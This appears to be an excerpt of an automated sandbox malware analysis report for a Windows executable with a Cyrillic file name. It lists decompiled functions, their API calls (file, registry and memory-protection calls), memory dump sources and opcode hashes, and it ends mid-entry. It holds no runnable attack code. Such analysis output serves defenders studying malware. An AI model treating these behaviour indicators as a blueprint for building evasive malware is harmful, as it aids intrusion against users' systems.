                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2547128583-0
                                                                                                                                                                                                                    • Opcode ID: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                                                                                                                                                                                                    • Instruction ID: 155b38c425e345f43688a0673e138072f65e923c2ca09dacbbabb210d44f0fbf
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50E0863250461156D31197709E4487762EC9B95750307483EF946F2091DB399C36A66D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00405DB0 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405DB4
                                                                                                                                                                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DD6
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$AttributesCreate
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 415043291-0
                                                                                                                                                                                                                    • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                                                                                                                                                                    • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00405D8B Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,00405990,?,?,00000000,00405B66,?,?,?,?), ref: 00405D90
                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405DA4
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                                                                    • Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                                                                                                                                                                    • Instruction ID: fe430eedc911e7c92ce83e5abbc00e08444bb0e311ec0623c818608bfa408f6d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1BD0C972504420ABD2512728AF0C89BBB95DB542717028B39FAA9A22B0CB304C568A98
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040586E Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,00403382,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,77573420,004035D9,?,00000006,00000008,0000000A), ref: 00405874
                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405882
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1375471231-0
                                                                                                                                                                                                                    • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                                                                                                                                                                    • Instruction ID: b5712d1dc6f90c91938fb9970759bfac189bcafefc635788875416fd9ee2894b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2FC04C712155019ED7546F619F08B277A50EB60781F158839A946E10E0DB348465ED2D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 6F262AAC Relevance: 1.6, APIs: 1, Instructions: 143fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • ReadFile.KERNELBASE(00000000), ref: 6F262B6B
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49589958063.000000006F261000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F260000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49589926339.000000006F260000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49589985935.000000006F264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49590017734.000000006F266000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_6f260000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileRead
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                                                                                                    • Opcode ID: 2f85ec045922dfe22ea227637239a4b74a8ed9bd3b306e16ef26f944bb69f23d
                                                                                                                                                                                                                    • Instruction ID: 34fd81d5111e30cfe2837b82b4dbb8ec0b20b588a326f56ad952867c0c7a8db6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f85ec045922dfe22ea227637239a4b74a8ed9bd3b306e16ef26f944bb69f23d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0F4185F1405709EFDF20DF68DA8AB693764EB49368F208416E404CA9C1D774E8D4CF91
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004027EF Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040280D
                                                                                                                                                                                                                      • Part of subcall function 00406201: wsprintfW.USER32 ref: 0040620E
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FilePointerwsprintf
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 327478801-0
                                                                                                                                                                                                                    • Opcode ID: 2074296acf118ace0f9b9ab2ab8615e2fe297c7dd6636d95e153eafbd2080ce7
                                                                                                                                                                                                                    • Instruction ID: 7f9197a1b1888ebfd6de04269447b21ffcaf0972564048b2e7bc6ee4a29003df
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2074296acf118ace0f9b9ab2ab8615e2fe297c7dd6636d95e153eafbd2080ce7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 29E06D71E04104AAD710EBA5AE098AEB768DB84318B24407FF201B50D1CA7949119E2D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00406155 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 0040617E
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Create
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2289755597-0
                                                                                                                                                                                                                    • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                                                                                                                                    • Instruction ID: dcb86bc894ab99bc20e37dc8a6176b737b641c0fdee4176656c7f25b47436c56
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 75E0E6B2110109BEEF195F50DD0AD7B375DE704304F01452EFA06D4091E6B5AD315634
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00405E62 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032FA,000000FF,00416A00,?,00416A00,?,?,00000004,00000000), ref: 00405E76
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileWrite
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3934441357-0
                                                                                                                                                                                                                    • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                                                                                                                    • Instruction ID: 8754e0b6f25d564075f0081c534dd79b85a2df0f0bc88b3642164a4a3ec1e455
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FDE0B63221065AAFDF109F95DC00AAB7B6CEB052A0F044437FD59E7150D671EA21DAE4
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00405E33 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403344,00000000,00000000,00403168,?,00000004,00000000,00000000,00000000), ref: 00405E47
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileRead
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                                                                                                    • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                                                                                                                    • Instruction ID: bd732019988057c431ec21c3a2c50b1292625b962aa4d7912315599e48db2a91
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A9E08C3220021AABCF20AF54DC00FEB3B6CEB05760F004832FD65E6040E230EA219BE8
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 6F262993 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(6F26505C,00000004,00000040,6F26504C), ref: 6F2629B1
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49589958063.000000006F261000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F260000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49589926339.000000006F260000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49589985935.000000006F264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49590017734.000000006F266000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_6f260000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                                                    • Opcode ID: 252dbfbe842cafd10f03ad4fa290c6a32fde90daea875c9c6b1595835679ccb8
                                                                                                                                                                                                                    • Instruction ID: 8d1191076e97a0d187285a060b8f6b96323a492481557748c07baba8f2967597
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 252dbfbe842cafd10f03ad4fa290c6a32fde90daea875c9c6b1595835679ccb8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 96F0A5B0504A85DFCB50CF3C864A7293BE0BB0E325B10C52AE188D6A42E374C0A8CF91
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00406127 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,0042C228,?,?,004061B5,0042C228,00000000,?,?,Call,?), ref: 0040614B
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Open
